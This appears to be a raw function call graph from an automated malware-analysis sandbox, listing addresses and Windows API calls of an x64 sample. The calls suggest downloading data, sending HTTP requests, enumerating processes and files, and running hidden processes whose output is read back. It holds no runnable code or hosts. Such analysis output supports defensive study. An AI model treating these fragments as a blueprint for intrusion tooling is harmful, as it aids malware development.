NtFreeVirtualMemory 4122->4125 4126 7ffb1e86d38a 4123->4126 4127 7ffb1e867b40 NtFreeVirtualMemory 4123->4127 4124 7ffb1e86ad34 NtAllocateVirtualMemory 4124->4132 4125->4123 4126->4121 4128 7ffb1e867b40 NtFreeVirtualMemory 4126->4128 4127->4126 4128->4121 4129 7ffb1e86d26b wsprintfA 4129->4132 4130 7ffb1e86cea4 12 API calls 4130->4132 4131 7ffb1e866b9c 3 API calls 4131->4132 4132->4122 4132->4124 4132->4129 4132->4130 4132->4131 4133 7ffb1e867acc 4 API calls 4132->4133 4133->4132 4135 7ffb1e86718f 4134->4135 4136 7ffb1e86719c MultiByteToWideChar 4135->4136 4291 7ffb1e866f48 4136->4291 4138 7ffb1e8672ab 4140 7ffb1e8672a4 4138->4140 4142 7ffb1e867b40 NtFreeVirtualMemory 4138->4142 4140->4096 4141 7ffb1e867217 VirtualAlloc 4143 7ffb1e86724a 4141->4143 4142->4140 4144 7ffb1e86ad34 NtAllocateVirtualMemory 4143->4144 4145 7ffb1e867254 CreateThread 4144->4145 4146 7ffb1e867b40 NtFreeVirtualMemory 4145->4146 4146->4140 4316 7ffb1e867e90 4147->4316 4149 7ffb1e866e34 4149->4096 4150 7ffb1e866e27 4150->4149 4324 7ffb1e8688a4 4150->4324 4153 7ffb1e867b40 NtFreeVirtualMemory 4154 7ffb1e866ea3 4153->4154 4155 7ffb1e866ecb MultiByteToWideChar 4154->4155 4156 7ffb1e866f48 12 API calls 4155->4156 4157 7ffb1e866f13 4156->4157 4157->4149 4158 7ffb1e86b400 3 API calls 4157->4158 4158->4149 4160 7ffb1e8630d0 12 API calls 4159->4160 4161 7ffb1e863823 4160->4161 4162 7ffb1e863830 4161->4162 4163 7ffb1e863250 12 API calls 4161->4163 4162->4117 4164 7ffb1e863839 4163->4164 4164->4162 4165 7ffb1e866b9c 3 API calls 4164->4165 4166 7ffb1e863850 4165->4166 4167 7ffb1e867694 2 API calls 4166->4167 4167->4162 4169 7ffb1e866c6b 4168->4169 4170 7ffb1e867e90 4 API calls 4169->4170 4172 7ffb1e866c97 4170->4172 4171 7ffb1e866ca4 4171->4096 4172->4171 4173 7ffb1e8688a4 3 API calls 4172->4173 4174 7ffb1e866cee wsprintfW 4173->4174 4175 7ffb1e867b40 NtFreeVirtualMemory 4174->4175 4176 7ffb1e866d13 4175->4176 4177 7ffb1e866d38 MultiByteToWideChar 4176->4177 4178 7ffb1e866f48 12 API calls 4177->4178 4179 7ffb1e866d7d 4178->4179 4180 7ffb1e866d9d MultiByteToWideChar 4179->4180 4180->4171 4181 7ffb1e866dd1 4180->4181 4181->4171 4331 7ffb1e86b4cc 4181->4331 4184 7ffb1e86ad34 NtAllocateVirtualMemory 4183->4184 4185 7ffb1e861c87 4184->4185 4186 7ffb1e86b984 3 API calls 4185->4186 4187 7ffb1e861cd0 4186->4187 4188 7ffb1e861cdc Process32First 4187->4188 4189 7ffb1e8620f6 4187->4189 4190 7ffb1e861d27 4188->4190 4191 7ffb1e861d06 Process32Next 4188->4191 4192 7ffb1e86b984 3 API calls 4189->4192 4194 7ffb1e86ad34 NtAllocateVirtualMemory 4190->4194 4191->4190 4191->4191 4193 7ffb1e862107 4192->4193 4193->4096 4195 7ffb1e861d37 Process32First 4194->4195 4196 7ffb1e861da0 Process32First 4195->4196 4197 7ffb1e861d53 4195->4197 4199 7ffb1e8620e1 4196->4199 4204 7ffb1e861dbb 4196->4204 4198 7ffb1e861d5b Process32Next 4197->4198 4198->4196 4198->4198 4200 7ffb1e867b40 NtFreeVirtualMemory 4199->4200 4201 7ffb1e8620eb CloseHandle 4200->4201 4201->4189 4202 7ffb1e8620c6 Process32Next 4202->4199 4202->4204 4203 7ffb1e86b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4203->4204 4204->4202 4204->4203 4205 7ffb1e861edb wsprintfA 4204->4205 4206 7ffb1e86b984 3 API calls 4205->4206 4208 7ffb1e861f08 4206->4208 4207 7ffb1e86b984 3 API calls 4207->4208 4208->4207 4209 7ffb1e861f81 wsprintfA 4208->4209 4210 7ffb1e86b984 3 API calls 4209->4210 4213 7ffb1e861fae 4210->4213 4212 7ffb1e86b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4212->4213 4213->4212 4214 7ffb1e86b984 3 API calls 4213->4214 4340 7ffb1e8614d8 CreateToolhelp32Snapshot 4213->4340 4214->4202 4215->4096 4217 7ffb1e864150 4216->4217 4218 7ffb1e86ad34 NtAllocateVirtualMemory 4217->4218 4219 7ffb1e86417c 4218->4219 4220 7ffb1e86ad34 NtAllocateVirtualMemory 4219->4220 4221 7ffb1e86418b 4220->4221 4222 7ffb1e867e90 4 API calls 4221->4222 4224 7ffb1e86419a 4222->4224 4223 7ffb1e8641a7 4223->4096 4224->4223 4225 7ffb1e8688a4 3 API calls 4224->4225 4226 7ffb1e86423d wsprintfW 4225->4226 4227 7ffb1e864267 4226->4227 4228 7ffb1e86428e wsprintfW 4227->4228 4229 7ffb1e8642b8 4228->4229 4230 7ffb1e86bb2c NtAllocateVirtualMemory 4229->4230 4231 7ffb1e8642c4 4230->4231 4232 7ffb1e866b9c 3 API calls 4231->4232 4233 7ffb1e8642d3 4232->4233 4234 7ffb1e86b9cc 3 API calls 4233->4234 4235 7ffb1e86430c 4234->4235 4236 7ffb1e86b984 3 API calls 4235->4236 4239 7ffb1e864359 4236->4239 4237 7ffb1e867588 4 API calls 4237->4239 4238 7ffb1e867b40 NtFreeVirtualMemory 4240 7ffb1e8645f2 4238->4240 4239->4237 4242 7ffb1e8688a4 3 API calls 4239->4242 4251 7ffb1e864435 4239->4251 4252 7ffb1e8688a4 3 API calls 4239->4252 4258 7ffb1e86459d wsprintfW 4239->4258 4241 7ffb1e867b40 NtFreeVirtualMemory 4240->4241 4243 7ffb1e864605 4241->4243 4244 7ffb1e8643ab wsprintfW 4242->4244 4245 7ffb1e867b40 NtFreeVirtualMemory 4243->4245 4246 7ffb1e8643db 4244->4246 4247 7ffb1e864618 4245->4247 4249 7ffb1e8643e5 MultiByteToWideChar 4246->4249 4248 7ffb1e867b40 NtFreeVirtualMemory 4247->4248 4248->4223 4250 7ffb1e866f48 12 API calls 4249->4250 4250->4239 4251->4238 4253 7ffb1e86447a wsprintfW 4252->4253 4255 7ffb1e8644a7 4253->4255 4254 7ffb1e8644ce wsprintfW 4254->4255 4255->4254 4256 7ffb1e86450d MultiByteToWideChar 4255->4256 4257 7ffb1e866f48 12 API calls 4256->4257 4257->4239 4259 7ffb1e86b4cc 5 API calls 4258->4259 4259->4239 4261 7ffb1e86ad34 NtAllocateVirtualMemory 4260->4261 4262 7ffb1e861a1b 4261->4262 4263 7ffb1e86b984 3 API calls 4262->4263 4264 7ffb1e861a5b 4263->4264 4356 7ffb1e867f1c 4264->4356 4266 7ffb1e861bdb 4268 7ffb1e867b40 NtFreeVirtualMemory 4266->4268 4269 7ffb1e861bed 4266->4269 4267 7ffb1e861a6e 4267->4266 4270 7ffb1e86b984 3 API calls 4267->4270 4268->4269 4271 7ffb1e86b984 3 API calls 4269->4271 4272 7ffb1e861aba FindFirstFileA 4270->4272 4273 7ffb1e861c28 4271->4273 4272->4266 4277 7ffb1e861ade 4272->4277 4273->4096 4274 7ffb1e861bb5 FindNextFileA 4275 7ffb1e861bd0 FindClose 4274->4275 4274->4277 4275->4266 4276 7ffb1e86b984 3 API calls 4276->4277 4277->4274 4277->4276 4278 7ffb1e861b80 wsprintfA 4277->4278 4279 7ffb1e86b984 3 API calls 4278->4279 4279->4277 4281 7ffb1e8672e3 4280->4281 4282 7ffb1e8672f0 MultiByteToWideChar 4281->4282 4283 7ffb1e866f48 12 API calls 4282->4283 4284 7ffb1e867341 4283->4284 4285 7ffb1e86ad34 NtAllocateVirtualMemory 4284->4285 4290 7ffb1e867400 4284->4290 4286 7ffb1e867376 4285->4286 4287 7ffb1e86ad34 NtAllocateVirtualMemory 4286->4287 4288 7ffb1e867399 CreateThread 4287->4288 4289 7ffb1e867b40 NtFreeVirtualMemory 4288->4289 4289->4290 4290->4096 4301 7ffb1e866f88 4291->4301 4293 7ffb1e866fec 4294 7ffb1e86713c 4293->4294 4295 7ffb1e867b40 NtFreeVirtualMemory 4293->4295 4296 7ffb1e867b40 NtFreeVirtualMemory 4294->4296 4300 7ffb1e8670ed 4294->4300 4295->4294 4296->4300 4297 7ffb1e86bb2c NtAllocateVirtualMemory 4297->4301 4298 7ffb1e8670e0 4299 7ffb1e867b40 NtFreeVirtualMemory 4298->4299 4299->4300 4300->4138 4300->4141 4301->4293 4301->4297 4301->4298 4302 7ffb1e866b9c 3 API calls 4301->4302 4303 7ffb1e867acc 4 API calls 4301->4303 4304 7ffb1e868d90 4301->4304 4302->4301 4303->4301 4305 7ffb1e868dcf InternetOpenW 4304->4305 4306 7ffb1e868e0f InternetOpenUrlW 4305->4306 4307 7ffb1e868e0a 4305->4307 4306->4307 4313 7ffb1e868e4b 4306->4313 4308 7ffb1e868f2e InternetCloseHandle 4307->4308 4309 7ffb1e868f39 4307->4309 4308->4309 4311 7ffb1e868f41 InternetCloseHandle 4309->4311 4312 7ffb1e868f4c 4309->4312 4310 7ffb1e868e56 InternetReadFile 4310->4313 4311->4312 4312->4301 4313->4307 4313->4310 4314 7ffb1e86af9c 3 API calls 4313->4314 4315 7ffb1e86ad34 NtAllocateVirtualMemory 4313->4315 4314->4313 4315->4313 4317 7ffb1e86ae1c 4316->4317 4318 7ffb1e867eaa SHGetFolderPathW 4317->4318 4319 7ffb1e867ed3 4318->4319 4320 7ffb1e86bb2c NtAllocateVirtualMemory 4319->4320 4322 7ffb1e867edf 4320->4322 4321 7ffb1e867eec 4321->4150 4322->4321 4323 7ffb1e86ba98 3 API calls 4322->4323 4323->4321 4325 7ffb1e86ae1c 4324->4325 4326 7ffb1e8688b7 GetCursorPos 4325->4326 4327 7ffb1e8688ca GetTickCount 4326->4327 4328 7ffb1e866e7e wsprintfW 4326->4328 4330 7ffb1e86af74 RtlRandom 4327->4330 4328->4153 4330->4328 4332 7ffb1e86b4ec 4331->4332 4333 7ffb1e86b5a4 4332->4333 4334 7ffb1e86b54a 4332->4334 4336 7ffb1e86b5d9 wsprintfW 4333->4336 4335 7ffb1e86b57f wsprintfW 4334->4335 4337 7ffb1e86b5f4 CreateProcessW 4335->4337 4336->4337 4338 7ffb1e86b64b CloseHandle CloseHandle 4337->4338 4339 7ffb1e86b647 4337->4339 4338->4339 4339->4171 4341 7ffb1e861530 Process32First 4340->4341 4342 7ffb1e86185d 4340->4342 4341->4342 4345 7ffb1e861556 4341->4345 4342->4213 4343 7ffb1e861842 Process32Next 4343->4342 4343->4345 4344 7ffb1e86b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4344->4345 4345->4343 4345->4344 4346 7ffb1e86167e wsprintfA 4345->4346 4347 7ffb1e86b984 3 API calls 4346->4347 4349 7ffb1e8616ae 4347->4349 4348 7ffb1e86b984 3 API calls 4348->4349 4349->4348 4350 7ffb1e861718 wsprintfA 4349->4350 4351 7ffb1e86b984 3 API calls 4350->4351 4354 7ffb1e861748 4351->4354 4352 7ffb1e86b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4352->4354 4353 7ffb1e8614d8 3 API calls 4353->4354 4354->4352 4354->4353 4355 7ffb1e86b984 3 API calls 4354->4355 4355->4343 4357 7ffb1e86ae1c 4356->4357 4358 7ffb1e867f36 SHGetFolderPathA 4357->4358 4359 7ffb1e867f5f 4358->4359 4360 7ffb1e86bae0 NtAllocateVirtualMemory 4359->4360 4362 7ffb1e867f6b 4360->4362 4361 7ffb1e867f78 4361->4267 4362->4361 4363 7ffb1e86b984 3 API calls 4362->4363 4363->4361 4364 7ffb1e862200 4365 7ffb1e862245 4364->4365 4423 7ffb1e86221e 4364->4423 4366 7ffb1e86ad34 NtAllocateVirtualMemory 4365->4366 4367 7ffb1e86224f 4366->4367 4367->4423 4482 7ffb1e861030 4367->4482 4369 7ffb1e862302 4370 7ffb1e861030 21 API calls 4369->4370 4371 7ffb1e86239a 4370->4371 4372 7ffb1e861030 21 API calls 4371->4372 4373 7ffb1e862433 4372->4373 4374 7ffb1e861030 21 API calls 4373->4374 4375 7ffb1e8624cc 4374->4375 4376 7ffb1e861030 21 API calls 4375->4376 4377 7ffb1e862565 4376->4377 4378 7ffb1e861030 21 API calls 4377->4378 4379 7ffb1e8625fe 4378->4379 4380 7ffb1e861030 21 API calls 4379->4380 4381 7ffb1e862697 4380->4381 4382 7ffb1e861030 21 API calls 4381->4382 4383 7ffb1e862730 4382->4383 4384 7ffb1e861030 21 API calls 4383->4384 4385 7ffb1e8627c9 4384->4385 4386 7ffb1e861030 21 API calls 4385->4386 4387 7ffb1e862862 4386->4387 4388 7ffb1e861030 21 API calls 4387->4388 4389 7ffb1e8628fb 4388->4389 4390 7ffb1e86ad34 NtAllocateVirtualMemory 4389->4390 4391 7ffb1e86290e 4390->4391 4392 7ffb1e8629d2 4391->4392 4393 7ffb1e866634 NtAllocateVirtualMemory 4391->4393 4391->4423 4394 7ffb1e866634 NtAllocateVirtualMemory 4392->4394 4395 7ffb1e862a73 4392->4395 4402 7ffb1e86295f 4393->4402 4404 7ffb1e862a00 4394->4404 4396 7ffb1e862b14 4395->4396 4397 7ffb1e866634 NtAllocateVirtualMemory 4395->4397 4398 7ffb1e866634 NtAllocateVirtualMemory 4396->4398 4399 7ffb1e862bb5 4396->4399 4407 7ffb1e862aa1 4397->4407 4412 7ffb1e862b42 4398->4412 4400 7ffb1e862c56 4399->4400 4401 7ffb1e866634 NtAllocateVirtualMemory 4399->4401 4403 7ffb1e862cf7 4400->4403 4405 7ffb1e866634 NtAllocateVirtualMemory 4400->4405 4415 7ffb1e862be3 4401->4415 4402->4392 4411 7ffb1e86b984 3 API calls 4402->4411 4406 7ffb1e866634 NtAllocateVirtualMemory 4403->4406 4408 7ffb1e862d98 4403->4408 4404->4395 4419 7ffb1e86b984 3 API calls 4404->4419 4425 7ffb1e862c84 4405->4425 4427 7ffb1e862d25 4406->4427 4407->4396 4421 7ffb1e86b984 3 API calls 4407->4421 4409 7ffb1e862e39 4408->4409 4413 7ffb1e866634 NtAllocateVirtualMemory 4408->4413 4414 7ffb1e866634 NtAllocateVirtualMemory 4409->4414 4418 7ffb1e862eda 4409->4418 4410 7ffb1e863034 4504 7ffb1e861868 4410->4504 4416 7ffb1e8629b9 4411->4416 4412->4399 4431 7ffb1e86b984 3 API calls 4412->4431 4436 7ffb1e862dc6 4413->4436 4439 7ffb1e862e67 4414->4439 4415->4400 4433 7ffb1e86b984 3 API calls 4415->4433 4422 7ffb1e86b984 3 API calls 4416->4422 4420 7ffb1e862f87 4418->4420 4424 7ffb1e866634 NtAllocateVirtualMemory 4418->4424 4426 7ffb1e862a5a 4419->4426 4420->4410 4428 7ffb1e866634 NtAllocateVirtualMemory 4420->4428 4429 7ffb1e862afb 4421->4429 4430 7ffb1e8629c8 4422->4430 4448 7ffb1e862f08 4424->4448 4425->4403 4442 7ffb1e86b984 3 API calls 4425->4442 4432 7ffb1e86b984 3 API calls 4426->4432 4427->4408 4445 7ffb1e86b984 3 API calls 4427->4445 4451 7ffb1e862fb5 4428->4451 4434 7ffb1e86b984 3 API calls 4429->4434 4435 7ffb1e867b40 NtFreeVirtualMemory 4430->4435 4437 7ffb1e862b9c 4431->4437 4438 7ffb1e862a69 4432->4438 4440 7ffb1e862c3d 4433->4440 4441 7ffb1e862b0a 4434->4441 4435->4392 4436->4409 4454 7ffb1e86b984 3 API calls 4436->4454 4443 7ffb1e86b984 3 API calls 4437->4443 4444 7ffb1e867b40 NtFreeVirtualMemory 4438->4444 4439->4418 4457 7ffb1e86b984 3 API calls 4439->4457 4446 7ffb1e86b984 3 API calls 4440->4446 4447 7ffb1e867b40 NtFreeVirtualMemory 4441->4447 4449 7ffb1e862cde 4442->4449 4450 7ffb1e862bab 4443->4450 4444->4395 4452 7ffb1e862d7f 4445->4452 4453 7ffb1e862c4c 4446->4453 4447->4396 4448->4420 4464 7ffb1e86b984 3 API calls 4448->4464 4455 7ffb1e86b984 3 API calls 4449->4455 4456 7ffb1e867b40 NtFreeVirtualMemory 4450->4456 4451->4410 4467 7ffb1e86b984 3 API calls 4451->4467 4458 7ffb1e86b984 3 API calls 4452->4458 4459 7ffb1e867b40 NtFreeVirtualMemory 4453->4459 4460 7ffb1e862e20 4454->4460 4461 7ffb1e862ced 4455->4461 4456->4399 4462 7ffb1e862ec1 4457->4462 4463 7ffb1e862d8e 4458->4463 4459->4400 4465 7ffb1e86b984 3 API calls 4460->4465 4466 7ffb1e867b40 NtFreeVirtualMemory 4461->4466 4468 7ffb1e86b984 3 API calls 4462->4468 4469 7ffb1e867b40 NtFreeVirtualMemory 4463->4469 4470 7ffb1e862f68 4464->4470 4471 7ffb1e862e2f 4465->4471 4466->4403 4474 7ffb1e863015 4467->4474 4475 7ffb1e862ed0 4468->4475 4469->4408 4472 7ffb1e86b984 3 API calls 4470->4472 4473 7ffb1e867b40 NtFreeVirtualMemory 4471->4473 4476 7ffb1e862f7a 4472->4476 4473->4409 4477 7ffb1e86b984 3 API calls 4474->4477 4478 7ffb1e867b40 NtFreeVirtualMemory 4475->4478 4479 7ffb1e867b40 NtFreeVirtualMemory 4476->4479 4480 7ffb1e863027 4477->4480 4478->4418 4479->4420 4481 7ffb1e867b40 NtFreeVirtualMemory 4480->4481 4481->4410 4483 7ffb1e8610b0 4482->4483 4484 7ffb1e8610c2 6 API calls 4483->4484 4530 7ffb1e861000 4484->4530 4486 7ffb1e8611ff CreateProcessW 4487 7ffb1e86ad34 NtAllocateVirtualMemory 4486->4487 4488 7ffb1e861265 4487->4488 4489 7ffb1e86ad34 NtAllocateVirtualMemory 4488->4489 4498 7ffb1e8612a2 4489->4498 4490 7ffb1e8614b4 4493 7ffb1e8614c6 4490->4493 4495 7ffb1e867b40 NtFreeVirtualMemory 4490->4495 4491 7ffb1e86146c TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4491->4490 4492 7ffb1e8612cd PeekNamedPipe 4494 7ffb1e861385 PeekNamedPipe 4492->4494 4492->4498 4493->4369 4496 7ffb1e861435 GetExitCodeProcess 4494->4496 4494->4498 4495->4493 4497 7ffb1e86145b 4496->4497 4496->4498 4497->4491 4498->4490 4498->4491 4498->4492 4498->4494 4498->4496 4500 7ffb1e861334 ReadFile 4498->4500 4502 7ffb1e8613e4 ReadFile 4498->4502 4531 7ffb1e86c934 NtDelayExecution 4498->4531 4501 7ffb1e86b984 3 API calls 4500->4501 4501->4494 4503 7ffb1e86b984 3 API calls 4502->4503 4503->4496 4505 7ffb1e86187d 4504->4505 4529 7ffb1e8619f7 4504->4529 4506 7ffb1e8618aa 4505->4506 4507 7ffb1e867b40 NtFreeVirtualMemory 4505->4507 4505->4529 4508 7ffb1e8618ca 4506->4508 4509 7ffb1e867b40 NtFreeVirtualMemory 4506->4509 4507->4506 4510 7ffb1e8618ea 4508->4510 4511 7ffb1e867b40 NtFreeVirtualMemory 4508->4511 4509->4508 4512 7ffb1e86190a 4510->4512 4513 7ffb1e867b40 NtFreeVirtualMemory 4510->4513 4511->4510 4514 7ffb1e86192a 4512->4514 4515 7ffb1e867b40 NtFreeVirtualMemory 4512->4515 4513->4512 4516 7ffb1e867b40 NtFreeVirtualMemory 4514->4516 4517 7ffb1e86194a 4514->4517 4515->4514 4516->4517 4518 7ffb1e867b40 NtFreeVirtualMemory 4517->4518 4520 7ffb1e86196a 4517->4520 4518->4520 4519 7ffb1e86198a 4522 7ffb1e8619aa 4519->4522 4523 7ffb1e867b40 NtFreeVirtualMemory 4519->4523 4520->4519 4521 7ffb1e867b40 NtFreeVirtualMemory 4520->4521 4521->4519 4524 7ffb1e8619ca 4522->4524 4525 7ffb1e867b40 NtFreeVirtualMemory 4522->4525 4523->4522 4526 7ffb1e8619ea 4524->4526 4528 7ffb1e867b40 NtFreeVirtualMemory 4524->4528 4525->4524 4527 7ffb1e867b40 NtFreeVirtualMemory 4526->4527 4527->4529 4528->4526 4529->4423 4530->4486 4531->4498 4532 7ffb1e86b670 4533 7ffb1e86b6f1 4532->4533 4534 7ffb1e86b68e 4532->4534 4535 7ffb1e86b6ba CreateFileMappingA 4534->4535 4535->4533 4536 7ffb1e86b6f8 MapViewOfFile 4535->4536 4536->4533 4539 7ffb1e86b72b 4536->4539 4537 7ffb1e86b7f7 VirtualFree 4538 7ffb1e867b40 NtFreeVirtualMemory 4537->4538 4540 7ffb1e86b828 UnmapViewOfFile CloseHandle 4538->4540 4539->4537 4541 7ffb1e86ad34 NtAllocateVirtualMemory 4539->4541 4540->4533 4542 7ffb1e86b761 4541->4542 4543 7ffb1e86b984 3 API calls 4542->4543 4544 7ffb1e86b7b3 4543->4544 4545 7ffb1e86b984 3 API calls 4544->4545 4546 7ffb1e86b7c5 4545->4546 4547 7ffb1e86bae0 NtAllocateVirtualMemory 4546->4547 4548 7ffb1e86b7db 4547->4548 4549 7ffb1e867b40 NtFreeVirtualMemory 4548->4549 4549->4537 4550 7ffb1e86745c 4551 7ffb1e867473 4550->4551 4552 7ffb1e867482 RtlInitUnicodeString NtOpenFile 4551->4552 4553 7ffb1e8674eb NtClose 4552->4553 4554 7ffb1e8674e7 4552->4554 4553->4554 4555 7ffb1e8652ae 4556 7ffb1e8650c8 4555->4556 4565 7ffb1e8651fb 4555->4565 4557 7ffb1e865175 4556->4557 4558 7ffb1e8650f5 4556->4558 4560 7ffb1e8651aa HttpOpenRequestA 4557->4560 4559 7ffb1e86512a HttpOpenRequestA 4558->4559 4561 7ffb1e8651f3 4559->4561 4560->4561 4562 7ffb1e86522d 4561->4562 4563 7ffb1e86520a InternetSetOptionA 4561->4563 4561->4565 4564 7ffb1e86527f HttpSendRequestA 4562->4564 4566 7ffb1e865237 4562->4566 4563->4562 4564->4565 4567 7ffb1e865254 HttpSendRequestA 4566->4567 4567->4565 4568 7ffb1e868f1c 4569 7ffb1e868dcf InternetOpenW 4568->4569 4573 7ffb1e868e0a 4568->4573 4572 7ffb1e868e0f InternetOpenUrlW 4569->4572 4569->4573 4570 7ffb1e868f2e InternetCloseHandle 4571 7ffb1e868f39 4570->4571 4574 7ffb1e868f41 InternetCloseHandle 4571->4574 4575 7ffb1e868f4c 4571->4575 4572->4573 4577 7ffb1e868e4b 4572->4577 4573->4570 4573->4571 4574->4575 4576 7ffb1e868e56 InternetReadFile 4576->4577 4577->4573 4577->4576 4578 7ffb1e86af9c 3 API calls 4577->4578 4579 7ffb1e86ad34 NtAllocateVirtualMemory 4577->4579 4578->4577 4579->4577 4580 7ffb1e86b398 4581 7ffb1e86b3ac 4580->4581 4582 7ffb1e86b3f2 4580->4582 4583 7ffb1e86b3ca VirtualFree 4581->4583 4584 7ffb1e867b40 NtFreeVirtualMemory 4583->4584 4584->4582 3418 7ffb1e863ce4 3421 7ffb1e863cb4 3418->3421 3427 7ffb1e863868 3421->3427 3423 7ffb1e863cbd 3424 7ffb1e863cdb 3423->3424 3426 7ffb1e863ccf 3423->3426 3426->3423 3459 7ffb1e86c934 NtDelayExecution 3426->3459 3428 7ffb1e863888 3427->3428 3460 7ffb1e866328 3428->3460 3430 7ffb1e86388d 3438 7ffb1e863891 3430->3438 3472 7ffb1e868560 3430->3472 3434 7ffb1e8638bc 3435 7ffb1e868820 4 API calls 3434->3435 3434->3438 3436 7ffb1e8638d7 3435->3436 3437 7ffb1e8638ed GetCurrentProcess IsWow64Process 3436->3437 3436->3438 3437->3438 3439 7ffb1e86391a 3437->3439 3438->3423 3483 7ffb1e8668e8 GetAdaptersInfo 3439->3483 3441 7ffb1e86391f 3441->3438 3442 7ffb1e863959 CreateMutexW 3441->3442 3442->3438 3443 7ffb1e863979 GetLastError 3442->3443 3443->3438 3444 7ffb1e86399c GetModuleHandleW 3443->3444 3490 7ffb1e86463c GetModuleHandleW GetCurrentProcessId 3444->3490 3455 7ffb1e8639f9 3608 7ffb1e866250 CreateThread 3455->3608 3459->3426 3461 7ffb1e866331 3460->3461 3471 7ffb1e866367 3461->3471 3610 7ffb1e86a59c 3461->3610 3471->3430 3473 7ffb1e86857e 3472->3473 3474 7ffb1e868590 RtlGetVersion 3473->3474 3475 7ffb1e86859b 3473->3475 3474->3475 3476 7ffb1e8685a5 GetVersionExW 3475->3476 3477 7ffb1e8638b3 3475->3477 3476->3477 3478 7ffb1e868820 CreateToolhelp32Snapshot 3477->3478 3479 7ffb1e86ae1c 3478->3479 3480 7ffb1e868850 Process32FirstW 3479->3480 3481 7ffb1e86886c Process32NextW 3480->3481 3482 7ffb1e86888a FindCloseChangeNotification 3480->3482 3481->3481 3481->3482 3482->3434 3484 7ffb1e866921 3483->3484 3485 7ffb1e866945 3483->3485 3486 7ffb1e86ad34 NtAllocateVirtualMemory 3484->3486 3487 7ffb1e866953 3485->3487 3489 7ffb1e867b40 NtFreeVirtualMemory 3485->3489 3488 7ffb1e86692c GetAdaptersInfo 3486->3488 3487->3441 3488->3485 3489->3487 3689 7ffb1e867b80 3490->3689 3494 7ffb1e864743 GetCurrentProcessId 3507 7ffb1e864690 3494->3507 3495 7ffb1e868560 2 API calls 3495->3507 3496 7ffb1e86478d GetCurrentProcessId OpenProcess 3498 7ffb1e8647b4 NtQueryInformationProcess 3496->3498 3496->3507 3501 7ffb1e864b27 FindCloseChangeNotification 3498->3501 3498->3507 3499 7ffb1e8639b1 3499->3438 3516 7ffb1e866988 3499->3516 3500 7ffb1e864c23 3708 7ffb1e864c38 3500->3708 3501->3507 3502 7ffb1e864b3c 3505 7ffb1e86bb2c NtAllocateVirtualMemory 3502->3505 3513 7ffb1e864c12 3502->3513 3504 7ffb1e86482a ReadProcessMemory 3504->3501 3506 7ffb1e864881 ReadProcessMemory 3504->3506 3510 7ffb1e864b71 3505->3510 3506->3501 3506->3507 3507->3494 3507->3495 3507->3496 3507->3501 3507->3502 3507->3504 3508 7ffb1e86ad34 NtAllocateVirtualMemory 3507->3508 3699 7ffb1e86841c 3507->3699 3509 7ffb1e864907 WideCharToMultiByte 3508->3509 3515 7ffb1e86496a 3509->3515 3512 7ffb1e867b40 NtFreeVirtualMemory 3510->3512 3510->3513 3511 7ffb1e866298 MultiByteToWideChar NtAllocateVirtualMemory 3511->3515 3512->3513 3513->3499 3513->3500 3514 7ffb1e867b40 NtFreeVirtualMemory 3514->3501 3515->3511 3515->3514 3517 7ffb1e86ad34 NtAllocateVirtualMemory 3516->3517 3518 7ffb1e8669a0 3517->3518 3744 7ffb1e86bae0 3518->3744 3520 7ffb1e8669f3 3521 7ffb1e86bae0 NtAllocateVirtualMemory 3520->3521 3522 7ffb1e8639c1 3521->3522 3522->3438 3523 7ffb1e866864 3522->3523 3524 7ffb1e86687c 3523->3524 3525 7ffb1e86bae0 NtAllocateVirtualMemory 3524->3525 3526 7ffb1e8639d1 3525->3526 3526->3438 3527 7ffb1e86cf14 3526->3527 3747 7ffb1e86cea4 3527->3747 3530 7ffb1e8639e1 3542 7ffb1e86378c 3530->3542 3533 7ffb1e86cf6c 3535 7ffb1e86d191 3533->3535 3536 7ffb1e867b40 NtFreeVirtualMemory 3533->3536 3534 7ffb1e86ad34 NtAllocateVirtualMemory 3540 7ffb1e86cf3e new[] 3534->3540 3537 7ffb1e86d1a3 3535->3537 3538 7ffb1e867b40 NtFreeVirtualMemory 3535->3538 3536->3535 3537->3530 3539 7ffb1e867b40 NtFreeVirtualMemory 3537->3539 3538->3537 3539->3530 3540->3533 3540->3534 3764 7ffb1e8679c8 3540->3764 3772 7ffb1e86ccbc 3540->3772 3876 7ffb1e863250 3542->3876 3545 7ffb1e8637b3 3545->3455 3551 7ffb1e8633ac 3545->3551 3546 7ffb1e866b9c 3 API calls 3547 7ffb1e8637c1 3546->3547 3548 7ffb1e8677b0 2 API calls 3547->3548 3549 7ffb1e8637e5 NtClose 3548->3549 3549->3545 3552 7ffb1e8630d0 12 API calls 3551->3552 3553 7ffb1e8633f7 3552->3553 3554 7ffb1e863404 3553->3554 3555 7ffb1e863250 12 API calls 3553->3555 3554->3455 3556 7ffb1e863410 3555->3556 3556->3554 3557 7ffb1e86bb2c NtAllocateVirtualMemory 3556->3557 3558 7ffb1e863437 3557->3558 3559 7ffb1e866b9c 3 API calls 3558->3559 3560 7ffb1e863446 3559->3560 3561 7ffb1e866b9c 3 API calls 3560->3561 3562 7ffb1e863450 3561->3562 3893 7ffb1e867588 3562->3893 3565 7ffb1e863712 3567 7ffb1e867b40 NtFreeVirtualMemory 3565->3567 3566 7ffb1e863462 3568 7ffb1e86bb2c NtAllocateVirtualMemory 3566->3568 3567->3554 3569 7ffb1e86347c 3568->3569 3570 7ffb1e866b9c 3 API calls 3569->3570 3571 7ffb1e86348b 3570->3571 3901 7ffb1e867504 3571->3901 3573 7ffb1e86349d 3573->3554 3574 7ffb1e8634dd wsprintfW 3573->3574 3575 7ffb1e8634fd 3574->3575 3576 7ffb1e863597 3574->3576 3578 7ffb1e863532 wsprintfW 3575->3578 3577 7ffb1e8635cc wsprintfW 3576->3577 3579 7ffb1e8635f3 3577->3579 3580 7ffb1e86355e 3578->3580 3581 7ffb1e863614 wsprintfW 3579->3581 3582 7ffb1e86357f wsprintfW 3580->3582 3583 7ffb1e86363f 3581->3583 3582->3583 3911 7ffb1e863728 3583->3911 3585 7ffb1e86365e 3586 7ffb1e867b40 NtFreeVirtualMemory 3585->3586 3587 7ffb1e863668 3586->3587 3588 7ffb1e867b40 NtFreeVirtualMemory 3587->3588 3589 7ffb1e863672 3588->3589 3590 7ffb1e867b40 NtFreeVirtualMemory 3589->3590 3591 7ffb1e86367f 3590->3591 3916 7ffb1e863c2c 3591->3916 3596 